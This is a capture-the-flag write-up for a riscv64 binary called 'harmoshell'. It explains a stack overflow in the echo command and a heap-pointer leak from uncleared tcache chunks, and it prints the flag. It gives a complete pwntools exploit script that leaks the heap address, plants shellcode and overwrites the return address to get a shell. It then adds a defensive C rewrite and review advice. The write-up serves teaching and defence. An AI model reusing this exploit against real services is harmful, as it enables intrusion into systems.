[Pwn] harmoshell - cpt.shao

xp0int Posted on Apr 29 2021

A riscv64 challenge that Ghidra decompiles directly. The bug is in the echo function: once the file table is full at 0x30 files, another echo reads 0x200 bytes, but there is only about 0x100 bytes of stack space, so the stack overflows. Chunks are not initialised on allocation either, so when a tcache chunk is reallocated a heap pointer can be leaked.

I spent a lot of time getting a full-system emulation environment working, and ended up with a Fedora RISC-V system that was comfortable to debug in. Under full-system emulation NX is enabled, so I also wasted a lot of time thinking about ROP. Then I tried the remote target: it is simply started in user mode, with no NX and no ASLR. Write the shellcode onto the heap, overflow to overwrite the return address, and execution jumps straight to it.

```python
#flag{bm08elDkEvWnZjJZOwPEkr1Vfk}
from pwn import *
import sys
import time
import re

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"
env = {'LD_PRELOAD': ''}

if len(sys.argv) == 1:
    p = process('')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: p.info(tag + ': {:#x}'.format(addr))

def touch(name):
    sla("$", "touch " + name)

def echo(name, content):
    sla("$", "echo > %s" % (name))
    time.sleep(0.1)
    se(content)
    time.sleep(0.1)

def echo_append(name, content):
    sla("$", "echo >> %s" % (name))
    se(content)

def cat(name):
    sla("$", "cat %s" % name)

def rm(name):
    sla("$", "rm %s" % name)

# allocate two chunks and free them back into tcache
for i in range(0x2):
    touch("a"*8)
for i in range(2):
    rm("a"*8)
# for i in range(2):
#     touch("b"*8)
touch("b"*8)
touch("c"*8)
# the recycled chunk is not cleared, so cat prints the stale heap pointer
cat("b"*8)
ru("Content: ")
leak_heap = uu64(ru('\n'))
info_addr("leak_heap", leak_heap)

SC = open("sc.bin", "rb").read()
echo("b"*8, "B"*0x100)
echo("c"*8, SC.ljust(0x20))  # shellcode here
# fill the table to 0x30 files so the next echo takes the 0x200-byte path
for i in range(0x30-2):
    touch("a"*8)
input("here?")
echo("d"*0x8, cyclic(312) + p64(leak_heap))
# gdb.attach(p, gdbcmd)
p.interactive()
```
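The two weaknesses the write-up describes, rebuilt from the defender's side as an added example (this is not the challenge binary's code nor the author's): the read limit is derived from the destination buffer size instead of from how many files exist, so the 0x30-file branch cannot write 0x200 bytes into a 0x100-byte stack buffer, and entries are allocated with calloc so a recycled tcache chunk carries no stale pointer for cat to print. The entry layout, the function names and every size other than 0x100, 0x200 and 0x30 are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sizes taken from the write-up: the vulnerable handler reads 0x200 bytes
 * into a stack buffer of roughly 0x100 bytes once 0x30 files exist. */
#define CONTENT_BUF 0x100
#define VULN_READ   0x200
#define MAX_FILES   0x30
#define NAME_LEN    0x20   /* assumed */

/* Hypothetical file entry; the real binary's layout is not known here. */
struct entry {
    char name[NAME_LEN];
    char *content;   /* would hold a stale heap pointer if the chunk were reused uncleared */
};

/* Hardened copy into the stack buffer: the bound comes from buf_size, never
 * from file-count state, and over-long input is rejected instead of truncated
 * silently. Returns the number of bytes stored, or -1 when it would overflow. */
int store_content(char *buf, size_t buf_size, const char *src, size_t src_len) {
    if (buf_size == 0 || src_len >= buf_size) return -1;
    memcpy(buf, src, src_len);
    buf[src_len] = '\0';
    return (int)src_len;
}

/* Hardened allocation: calloc clears the chunk, so whatever a freed tcache
 * chunk held (its next pointer, old contents) can never be read back. */
struct entry *alloc_entry_cleared(const char *name) {
    struct entry *e = calloc(1, sizeof *e);
    if (e == NULL) return NULL;
    strncpy(e->name, name, NAME_LEN - 1);   /* calloc already placed the terminator */
    return e;
}

/* Stand-alone check with constructed input: offer VULN_READ bytes to a
 * CONTENT_BUF-sized buffer and confirm the store is refused. */
int main(void) {
    char src[VULN_READ];
    memset(src, 'A', sizeof src);
    char stackbuf[CONTENT_BUF];
    int n = store_content(stackbuf, sizeof stackbuf, src, sizeof src);
    printf("storing %d bytes into a %d-byte buffer -> %d\n", VULN_READ, CONTENT_BUF, n);
    struct entry *e = alloc_entry_cleared("bbbbbbbb");
    printf("fresh entry content pointer: %p\n", (void *)e->content);
    free(e);
    return 0;
}
```

The detection angle is the same as the fix: a read size that is a different constant from the destination buffer (0x200 against 0x100 here) is the pattern to flag in review, and a chunk handed out by malloc whose fields are read before they are written is the uninitialised-memory pattern behind the heap leak.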